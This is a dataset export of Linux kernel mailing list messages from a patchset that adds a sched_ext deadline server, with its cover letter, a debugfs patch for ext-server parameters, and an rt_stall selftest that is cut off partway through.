source
large_stringclasses 2
values | subject
large_stringclasses 112
values | code
large_stringclasses 112
values | critique
large_stringlengths 61
3.04M
⌀ | metadata
dict |
|---|---|---|---|---|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify the starvation fixes and
bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch requires [1] to function properly (sent
separately, not included in this patch set).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the reservation bandwdith
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to few patches
- Fixes to few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
|
From: Joel Fernandes <joelagnelf@nvidia.com>
When a sched_ext server is loaded, tasks in the fair class are
automatically moved to the sched_ext class. Add support to modify the
ext server parameters similar to how the fair server parameters are
modified.
Re-use common code between ext and fair servers as needed.
Tested-by: Christian Loehle <christian.loehle@arm.com>
Reviewed-by: Juri Lelli <juri.lelli@redhat.com>
Co-developed-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
---
kernel/sched/debug.c | 157 ++++++++++++++++++++++++++++++++++++-------
1 file changed, 133 insertions(+), 24 deletions(-)
diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
index dd793f8f3858a..2e9896668c6fd 100644
--- a/kernel/sched/debug.c
+++ b/kernel/sched/debug.c
@@ -336,14 +336,16 @@ enum dl_param {
DL_PERIOD,
};
-static unsigned long fair_server_period_max = (1UL << 22) * NSEC_PER_USEC; /* ~4 seconds */
-static unsigned long fair_server_period_min = (100) * NSEC_PER_USEC; /* 100 us */
+static unsigned long dl_server_period_max = (1UL << 22) * NSEC_PER_USEC; /* ~4 seconds */
+static unsigned long dl_server_period_min = (100) * NSEC_PER_USEC; /* 100 us */
-static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubuf,
- size_t cnt, loff_t *ppos, enum dl_param param)
+static ssize_t sched_server_write_common(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos, enum dl_param param,
+ void *server)
{
long cpu = (long) ((struct seq_file *) filp->private_data)->private;
struct rq *rq = cpu_rq(cpu);
+ struct sched_dl_entity *dl_se = (struct sched_dl_entity *)server;
u64 runtime, period;
int retval = 0;
size_t err;
@@ -356,8 +358,8 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
scoped_guard (rq_lock_irqsave, rq) {
bool is_active;
- runtime = rq->fair_server.dl_runtime;
- period = rq->fair_server.dl_period;
+ runtime = dl_se->dl_runtime;
+ period = dl_se->dl_period;
switch (param) {
case DL_RUNTIME:
@@ -373,25 +375,25 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
}
if (runtime > period ||
- period > fair_server_period_max ||
- period < fair_server_period_min) {
+ period > dl_server_period_max ||
+ period < dl_server_period_min) {
return -EINVAL;
}
- is_active = dl_server_active(&rq->fair_server);
+ is_active = dl_server_active(dl_se);
if (is_active) {
update_rq_clock(rq);
- dl_server_stop(&rq->fair_server);
+ dl_server_stop(dl_se);
}
- retval = dl_server_apply_params(&rq->fair_server, runtime, period, 0);
+ retval = dl_server_apply_params(dl_se, runtime, period, 0);
if (!runtime)
- printk_deferred("Fair server disabled in CPU %d, system may crash due to starvation.\n",
- cpu_of(rq));
+ printk_deferred("%s server disabled in CPU %d, system may crash due to starvation.\n",
+ server == &rq->fair_server ? "Fair" : "Ext", cpu_of(rq));
if (is_active && runtime)
- dl_server_start(&rq->fair_server);
+ dl_server_start(dl_se);
if (retval < 0)
return retval;
@@ -401,36 +403,42 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
return cnt;
}
-static size_t sched_fair_server_show(struct seq_file *m, void *v, enum dl_param param)
+static size_t sched_server_show_common(struct seq_file *m, void *v, enum dl_param param,
+ void *server)
{
- unsigned long cpu = (unsigned long) m->private;
- struct rq *rq = cpu_rq(cpu);
+ struct sched_dl_entity *dl_se = (struct sched_dl_entity *)server;
u64 value;
switch (param) {
case DL_RUNTIME:
- value = rq->fair_server.dl_runtime;
+ value = dl_se->dl_runtime;
break;
case DL_PERIOD:
- value = rq->fair_server.dl_period;
+ value = dl_se->dl_period;
break;
}
seq_printf(m, "%llu\n", value);
return 0;
-
}
static ssize_t
sched_fair_server_runtime_write(struct file *filp, const char __user *ubuf,
size_t cnt, loff_t *ppos)
{
- return sched_fair_server_write(filp, ubuf, cnt, ppos, DL_RUNTIME);
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_RUNTIME,
+ &rq->fair_server);
}
static int sched_fair_server_runtime_show(struct seq_file *m, void *v)
{
- return sched_fair_server_show(m, v, DL_RUNTIME);
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_RUNTIME, &rq->fair_server);
}
static int sched_fair_server_runtime_open(struct inode *inode, struct file *filp)
@@ -446,16 +454,57 @@ static const struct file_operations fair_server_runtime_fops = {
.release = single_release,
};
+#ifdef CONFIG_SCHED_CLASS_EXT
+static ssize_t
+sched_ext_server_runtime_write(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos)
+{
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_RUNTIME,
+ &rq->ext_server);
+}
+
+static int sched_ext_server_runtime_show(struct seq_file *m, void *v)
+{
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_RUNTIME, &rq->ext_server);
+}
+
+static int sched_ext_server_runtime_open(struct inode *inode, struct file *filp)
+{
+ return single_open(filp, sched_ext_server_runtime_show, inode->i_private);
+}
+
+static const struct file_operations ext_server_runtime_fops = {
+ .open = sched_ext_server_runtime_open,
+ .write = sched_ext_server_runtime_write,
+ .read = seq_read,
+ .llseek = seq_lseek,
+ .release = single_release,
+};
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static ssize_t
sched_fair_server_period_write(struct file *filp, const char __user *ubuf,
size_t cnt, loff_t *ppos)
{
- return sched_fair_server_write(filp, ubuf, cnt, ppos, DL_PERIOD);
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_PERIOD,
+ &rq->fair_server);
}
static int sched_fair_server_period_show(struct seq_file *m, void *v)
{
- return sched_fair_server_show(m, v, DL_PERIOD);
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_PERIOD, &rq->fair_server);
}
static int sched_fair_server_period_open(struct inode *inode, struct file *filp)
@@ -471,6 +520,40 @@ static const struct file_operations fair_server_period_fops = {
.release = single_release,
};
+#ifdef CONFIG_SCHED_CLASS_EXT
+static ssize_t
+sched_ext_server_period_write(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos)
+{
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_PERIOD,
+ &rq->ext_server);
+}
+
+static int sched_ext_server_period_show(struct seq_file *m, void *v)
+{
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_PERIOD, &rq->ext_server);
+}
+
+static int sched_ext_server_period_open(struct inode *inode, struct file *filp)
+{
+ return single_open(filp, sched_ext_server_period_show, inode->i_private);
+}
+
+static const struct file_operations ext_server_period_fops = {
+ .open = sched_ext_server_period_open,
+ .write = sched_ext_server_period_write,
+ .read = seq_read,
+ .llseek = seq_lseek,
+ .release = single_release,
+};
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static struct dentry *debugfs_sched;
static void debugfs_fair_server_init(void)
@@ -494,6 +577,29 @@ static void debugfs_fair_server_init(void)
}
}
+#ifdef CONFIG_SCHED_CLASS_EXT
+static void debugfs_ext_server_init(void)
+{
+ struct dentry *d_ext;
+ unsigned long cpu;
+
+ d_ext = debugfs_create_dir("ext_server", debugfs_sched);
+ if (!d_ext)
+ return;
+
+ for_each_possible_cpu(cpu) {
+ struct dentry *d_cpu;
+ char buf[32];
+
+ snprintf(buf, sizeof(buf), "cpu%lu", cpu);
+ d_cpu = debugfs_create_dir(buf, d_ext);
+
+ debugfs_create_file("runtime", 0644, d_cpu, (void *) cpu, &ext_server_runtime_fops);
+ debugfs_create_file("period", 0644, d_cpu, (void *) cpu, &ext_server_period_fops);
+ }
+}
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static __init int sched_init_debug(void)
{
struct dentry __maybe_unused *numa;
@@ -532,6 +638,9 @@ static __init int sched_init_debug(void)
debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
debugfs_fair_server_init();
+#ifdef CONFIG_SCHED_CLASS_EXT
+ debugfs_ext_server_init();
+#endif
return 0;
}
--
2.52.0
|
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:03 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify the starvation fixes and
bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch requires [1] to function properly (sent
separately, not included in this patch set).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the reservation bandwdith
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to few patches
- Fixes to few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
|
Add a selftest to validate the correct behavior of the deadline server
for the ext_sched_class.
Reviewed-by: Emil Tsalapatis <emil@etsalapatis.com>
Tested-by: Christian Loehle <christian.loehle@arm.com>
Co-developed-by: Joel Fernandes <joelagnelf@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
---
tools/testing/selftests/sched_ext/Makefile | 1 +
.../selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 ++++++++++++++++++
3 files changed, 264 insertions(+)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
diff --git a/tools/testing/selftests/sched_ext/Makefile b/tools/testing/selftests/sched_ext/Makefile
index 5fe45f9c5f8fd..c9255d1499b6e 100644
--- a/tools/testing/selftests/sched_ext/Makefile
+++ b/tools/testing/selftests/sched_ext/Makefile
@@ -183,6 +183,7 @@ auto-test-targets := \
select_cpu_dispatch_bad_dsq \
select_cpu_dispatch_dbl_dsp \
select_cpu_vtime \
+ rt_stall \
test_example \
testcase-targets := $(addsuffix .o,$(addprefix $(SCXOBJ_DIR)/,$(auto-test-targets)))
diff --git a/tools/testing/selftests/sched_ext/rt_stall.bpf.c b/tools/testing/selftests/sched_ext/rt_stall.bpf.c
new file mode 100644
index 0000000000000..80086779dd1eb
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/rt_stall.bpf.c
@@ -0,0 +1,23 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * A scheduler that verified if RT tasks can stall SCHED_EXT tasks.
+ *
+ * Copyright (c) 2025 NVIDIA Corporation.
+ */
+
+#include <scx/common.bpf.h>
+
+char _license[] SEC("license") = "GPL";
+
+UEI_DEFINE(uei);
+
+void BPF_STRUCT_OPS(rt_stall_exit, struct scx_exit_info *ei)
+{
+ UEI_RECORD(uei, ei);
+}
+
+SEC(".struct_ops.link")
+struct sched_ext_ops rt_stall_ops = {
+ .exit = (void *)rt_stall_exit,
+ .name = "rt_stall",
+};
diff --git a/tools/testing/selftests/sched_ext/rt_stall.c b/tools/testing/selftests/sched_ext/rt_stall.c
new file mode 100644
index 0000000000000..015200f80f6e2
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/rt_stall.c
@@ -0,0 +1,240 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (c) 2025 NVIDIA Corporation.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/prctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <linux/sched.h>
+#include <signal.h>
+#include <bpf/bpf.h>
+#include <scx/common.h>
+#include <unistd.h>
+#include "rt_stall.bpf.skel.h"
+#include "scx_test.h"
+#include "../kselftest.h"
+
+#define CORE_ID 0 /* CPU to pin tasks to */
+#define RUN_TIME 5 /* How long to run the test in seconds */
+
+/* Simple busy-wait function for test tasks */
+static void process_func(void)
+{
+ while (1) {
+ /* Busy wait */
+ for (volatile unsigned long i = 0; i < 10000000UL; i++)
+ ;
+ }
+}
+
+/* Set CPU affinity to a specific core */
+static void set_affinity(int cpu)
+{
+ cpu_set_t mask;
+
+ CPU_ZERO(&mask);
+ CPU_SET(cpu, &mask);
+ if (sched_setaffinity(0, sizeof(mask), &mask) != 0) {
+ perror("sched_setaffinity");
+ exit(EXIT_FAILURE);
+ }
+}
+
+/* Set task scheduling policy and priority */
+static void set_sched(int policy, int priority)
+{
+ struct sched_param param;
+
+ param.sched_priority = priority;
+ if (sched_setscheduler(0, policy, ¶m) != 0) {
+ perror("sched_setscheduler");
+ exit(EXIT_FAILURE);
+ }
+}
+
+/* Get process runtime from /proc/<pid>/stat */
+static float get_process_runtime(int pid)
+{
+ char path[256];
+ FILE *file;
+ long utime, stime;
+ int fields;
+
+ snprintf(path, sizeof(path), "/proc/%d/stat", pid);
+ file = fopen(path, "r");
+ if (file == NULL) {
+ perror("Failed to open stat file");
+ return -1;
+ }
+
+ /* Skip the first 13 fields and read the 14th and 15th */
+ fields = fscanf(file,
+ "%*d %*s %*c %*d %*d %*d %*d %*d %*u %*u %*u %*u %*u %lu %lu",
+ &utime, &stime);
+ fclose(file);
+
+ if (fields != 2) {
+ fprintf(stderr, "Failed to read stat file\n");
+ return -1;
+ }
+
+ /* Calculate the total time spent in the process */
+ long total_time = utime + stime;
+ long ticks_per_second = sysconf(_SC_CLK_TCK);
+ float runtime_seconds = total_time * 1.0 / ticks_per_second;
+
+ return runtime_seconds;
+}
+
+static enum scx_test_status setup(void **ctx)
+{
+ struct rt_stall *skel;
+
+ skel = rt_stall__open();
+ SCX_FAIL_IF(!skel, "Failed to open");
+ SCX_ENUM_INIT(skel);
+ SCX_FAIL_IF(rt_stall__load(skel), "Failed to load skel");
+
+ *ctx = skel;
+
+ return SCX_TEST_PASS;
+}
+
+static bool sched_stress_test(bool is_ext)
+{
+ /*
+ * We're expecting the EXT task to get around 5% of CPU time when
+ * competing with the RT task (small 1% fluctuations are expected).
+ *
+ * However, the EXT task should get at least 4% of the CPU to prove
+ * that the EXT deadline server is working correctly. A percentage
+ * less than 4% indicates a bug where RT tasks can potentially
+ * stall SCHED_EXT tasks, causing the test to fail.
+ */
+ const float expected_min_ratio = 0.04; /* 4% */
+ const char *class_str = is_ext ? "EXT" : "FAIR";
+
+ float ext_runtime, rt_runtime, actual_ratio;
+ int ext_pid, rt_pid;
+
+ ksft_print_header();
+ ksft_set_plan(1);
+
+ /* Create and set up a EXT task */
+ ext_pid = fork();
+ if (ext_pid == 0) {
+ set_affinity(CORE_ID);
+ process_func();
+ exit(0);
+ } else if (ext_pid < 0) {
+ perror("fork task");
+ ksft_exit_fail();
+ }
+
+ /* Create an RT task */
+ rt_pid = fork();
+ if (rt_pid == 0) {
+ set_affinity(CORE_ID);
+ set_sched(SCHED_FIFO, 50);
+ process_func();
+ exit(0);
+ } else if (rt_pid < 0) {
+ perror("fork for RT task");
+ ksft_exit_fail();
+ }
+
+ /* Let the processes run for the specified time */
+ sleep(RUN_TIME);
+
+ /* Get runtime for the EXT task */
+ ext_runtime = get_process_runtime(ext_pid);
+ if (ext_runtime == -1)
+ ksft_exit_fail_msg("Error getting runtime for %s task (PID %d)\n",
+ class_str, ext_pid);
+ ksft_print_msg("Runtime of %s task (PID %d) is %f seconds\n",
+ class_str, ext_pid, ext_runtime);
+
+ /* Get runtime for the RT task */
+ rt_runtime = get_process_runtime(rt_pid);
+ if (rt_runtime == -1)
+ ksft_exit_fail_msg("Error getting runtime for RT task (PID %d)\n", rt_pid);
+ ksft_print_msg("Runtime of RT task (PID %d) is %f seconds\n", rt_pid, rt_runtime);
+
+ /* Kill the processes */
+ kill(ext_pid, SIGKILL);
+ kill(rt_pid, SIGKILL);
+ waitpid(ext_pid, NULL, 0);
+ waitpid(rt_pid, NULL, 0);
+
+ /* Verify that the scx task got enough runtime */
+ actual_ratio = ext_runtime / (ext_runtime + rt_runtime);
+ ksft_print_msg("%s task got %.2f%% of total runtime\n",
+ class_str, actual_ratio * 100);
+
+ if (actual_ratio >= expected_min_ratio) {
+ ksft_test_result_pass("PASS: %s task got more than %.2f%% of runtime\n",
